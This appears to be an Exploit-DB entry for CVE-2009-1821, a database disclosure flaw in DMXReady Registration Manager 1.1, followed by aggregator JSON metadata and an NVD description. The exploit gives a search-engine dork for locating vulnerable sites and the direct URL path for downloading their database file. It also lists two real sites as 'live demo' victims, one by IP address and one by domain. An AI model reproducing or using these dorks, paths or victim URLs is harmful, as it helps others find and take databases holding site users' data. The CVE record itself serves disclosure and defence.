ID EDB-ID:8705Type exploitdbReporter S4S-T3rr0r!sTModified 2009-05-15T00:00:00
Description
DMXReady Registration Manager 1.1 Database Disclosure Vulnerability. CVE-2009-1821. Webapps exploit for asp platform
************************************************** *****************************
# Title : DMXReady Registration Manager 1.1 Remote Database Disclosure Vulnerability
# Author : S4S-T3rr0r!sT
# Contact : l3t@hotmail.com / S4S@n2m3.com
# S.Page : DMXReady CMS Plugin Applications Web Site Design Extensions Dreamweaver ASP Template Database Driven
# Site : WwW.s3curi7y.com / www.h-t.cc
************************************************** *****************************
D0rk : "inurl:inc_webblogmanager.asp"
Exploit :
# http://[target].com/[path]/databases/webblogmanager.mdb
l!ve D3mo :
# http://74.200.213.93/databases/webblogmanager.mdb
# http://www.nomorewar.com/databases/webblogmanager.mdb
V1V4 GaZa
./Done
Thanx To : Cold-Z3ro , HcJ , ViRuSMaN , AlQaYsAr , zAx , Cyb3r-Err0r ,Arabic S3curi7y crew Members, all arabian hacker
# milw0rm.com [2009-05-15]
{"id": "EDB-ID:8705", "hash": "d2736623d702575cd084ea9e1e616b5f", "type": "exploitdb", "bulletinFamily": "exploit", "title": "DMXReady Registration Manager 1.1 Database Disclosure Vulnerability", "description": "DMXReady Registration Manager 1.1 Database Disclosure Vulnerability. CVE-2009-1821. Webapps exploit for asp platform", "published": "2009-05-15T00:00:00", "modified": "2009-05-15T00:00:00", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "href": "https://www.exploit-db.com/exploits/8705/", "reporter": "S4S-T3rr0r!sT", "references": [], "cvelist": ["CVE-2009-1821"], "lastseen": "2016-02-01T07:58:24", "history": [], "viewCount": 5, "enchantments": {"score": {"value": 5.4, "vector": "NONE", "modified": "2016-02-01T07:58:24"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2009-1821"]}], "modified": "2016-02-01T07:58:24"}, "vulnersScore": 5.4}, "objectVersion": "1.4", "sourceHref": "https://www.exploit-db.com/download/8705/", "sourceData": "************************************************** *****************************\n# Title : DMXReady Registration Manager 1.1 Remote Database Disclosure Vulnerability\n# Author : S4S-T3rr0r!sT\n# Contact : l3t@hotmail.com / S4S@n2m3.com\n# S.Page : DMXReady CMS Plugin Applications Web Site Design Extensions Dreamweaver ASP Template Database Driven\n# Site : WwW.s3curi7y.com / www.h-t.cc\n************************************************** *****************************\n\nD0rk : \"inurl:inc_webblogmanager.asp\"\n\nExploit :\n\n# http://[target].com/[path]/databases/webblogmanager.mdb\n\nl!ve D3mo :\n\n# http://74.200.213.93/databases/webblogmanager.mdb\n# http://www.nomorewar.com/databases/webblogmanager.mdb\n\n\nV1V4 GaZa\n\n./Done\n\nThanx To : Cold-Z3ro , HcJ , ViRuSMaN , AlQaYsAr , zAx , Cyb3r-Err0r ,Arabic S3curi7y crew Members, all arabian hacker\n\n# milw0rm.com [2009-05-15]\n", "osvdbidlist": ["54816"], "_object_type": "robots.models.exploitdb.ExploitDbBulletin", "_object_types": ["robots.models.exploitdb.ExploitDbBulletin", "robots.models.base.Bulletin"]}
{"cve": [{"lastseen": "2019-05-29T18:09:58", "bulletinFamily": "NVD", "description": "DMXReady Registration Manager 1.1 stores sensitive information under the web root with insufficient access control, which allows remote attackers to download the database file via a direct request for databases/webblogmanager.mdb.", "modified": "2017-09-29T01:34:00", "id": "CVE-2009-1821", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-1821", "published": "2009-05-29T16:30:00", "title": "CVE-2009-1821", "type": "cve", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}]}
